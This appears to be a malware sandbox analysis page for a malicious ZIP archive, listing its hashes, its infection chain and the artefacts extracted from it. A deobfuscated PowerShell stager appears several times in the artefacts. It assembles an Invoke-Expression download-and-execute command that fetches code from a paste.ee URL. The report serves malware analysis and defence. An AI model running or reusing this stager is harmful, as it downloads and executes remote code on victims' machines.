Malicious
Malicious

4614600c11d5149be251283e722d32726cb20c[...]d23.zip

ZIP Archive
|
MD5: 07bc1d10c2f5d35351d6e519309ef0b3
|
Size: 3.24 KB
|
application/zip

Infection Chain
Summary by MalvaGPT
Characteristics
Hash
 Hash Value
MD5
07bc1d10c2f5d35351d6e519309ef0b3
Sha1
156c1a9069df9c2356ac38eaa09b627abe38a9c1
Sha256
242c8233fb25e6a0a5add89e66dda791543e80a4e5df0b6e8e614c4bb8fa41b0
Sha384
fbd0f754d91c65dee2c037edae923269bc0658b1ab11bfb03906f45b5775caeee6d56c26d260229b93b35313c7e9263b
Sha512
9548d27be4048b65ec01d2aa6c1d0e6cbecccb0482a60f1956fff9608c493dd52f8f862649c80b005e543a6360b543a03c1d4a2b4d9130e9771d47bc539adbde
SSDeep
96:RA4dKdC1b42DJIllDk9scFj9atEgBNIqXU:7kElDizk97tWEgBNE
TLSH
7F612B111D7CFA70D4C29A77B19DA6A0D5AC13DC205572CB244C06B21E225B7CFDB5AB
File Structure
4614600c11d5149be251283e722d32726cb20cffd85807b94437446fc5d48d23.zip
Malicious
4614600c11d5149be251283e722d32726cb20cffd85807b94437446fc5d48d23.bin
Malicious
[Job Id=manage-quskzyjvyx Name=No Name]
Malicious
[VBScript] #0
Malicious
[VBScript] #0.deobfuscated.vbs
Malicious
[Command #0]
Malicious
[PowerShell Command]
Malicious
[Deobfuscated PS]
Malicious
Artefacts
Name
 Value
Deobfuscated PowerShell

$ReDrO = $R = "IeX(Ne" $RE = $R + "W-OBJ" $RED = $RE + "eCT NeT.W" $PAC = "eBCL" $xx = $PAC + "IeN" $RO = $xx + "T).DOWNLO" $zz = "ADSTRING('https://paste.ee/r/tuG3r/0')" Invoke-Expression ($RED + $RO + $zz) powershell $ReDrO
Deobfuscated PowerShell

$ReDrO = $R = "IeX(Ne" $RE = $R + "W-OBJ" $RED = $RE + "eCT NeT.W" $PAC = "eBCL" $xx = $PAC + "IeN" $RO = $xx + "T).DOWNLO" $zz = "ADSTRING('https://paste.ee/r/tuG3r/0')" Invoke-Expression ($RED + $RO + $zz) powershell $ReDrO
4614600c11d5149be251283e722d32726cb20cffd85807b94437446fc5d48d23.zip (3.24 KB)
File Structure
4614600c11d5149be251283e722d32726cb20cffd85807b94437446fc5d48d23.zip
Malicious
4614600c11d5149be251283e722d32726cb20cffd85807b94437446fc5d48d23.bin
Malicious
[Job Id=manage-quskzyjvyx Name=No Name]
Malicious
[VBScript] #0
Malicious
[VBScript] #0.deobfuscated.vbs
Malicious
[Command #0]
Malicious
[PowerShell Command]
Malicious
[Deobfuscated PS]
Malicious
Characteristics
No malware configuration were found at this point.
Artefacts
Name
 Value Location
Deobfuscated PowerShell

$ReDrO = $R = "IeX(Ne" $RE = $R + "W-OBJ" $RED = $RE + "eCT NeT.W" $PAC = "eBCL" $xx = $PAC + "IeN" $RO = $xx + "T).DOWNLO" $zz = "ADSTRING('https://paste.ee/r/tuG3r/0')" Invoke-Expression ($RED + $RO + $zz) powershell $ReDrO

Malicious

4614600c11d5149be251283e722d32726cb20cffd85807b94437446fc5d48d23.zip > 4614600c11d5149be251283e722d32726cb20cffd85807b94437446fc5d48d23.bin > [Job Id=manage-quskzyjvyx Name=No Name] > [VBScript] #0 > [VBScript] #0.deobfuscated.vbs > [Command #0] > [PowerShell Command]
Deobfuscated PowerShell

$ReDrO = $R = "IeX(Ne" $RE = $R + "W-OBJ" $RED = $RE + "eCT NeT.W" $PAC = "eBCL" $xx = $PAC + "IeN" $RO = $xx + "T).DOWNLO" $zz = "ADSTRING('https://paste.ee/r/tuG3r/0')" Invoke-Expression ($RED + $RO + $zz) powershell $ReDrO

Malicious

4614600c11d5149be251283e722d32726cb20cffd85807b94437446fc5d48d23.zip > 4614600c11d5149be251283e722d32726cb20cffd85807b94437446fc5d48d23.bin > [Job Id=manage-quskzyjvyx Name=No Name] > [VBScript] #0 > [VBScript] #0.deobfuscated.vbs > [Command #0] > [PowerShell Command] > [Deobfuscated PS]
You must be signed in to post a comment.
An error has occurred. This application may no longer respond until reloaded. Reload 🗙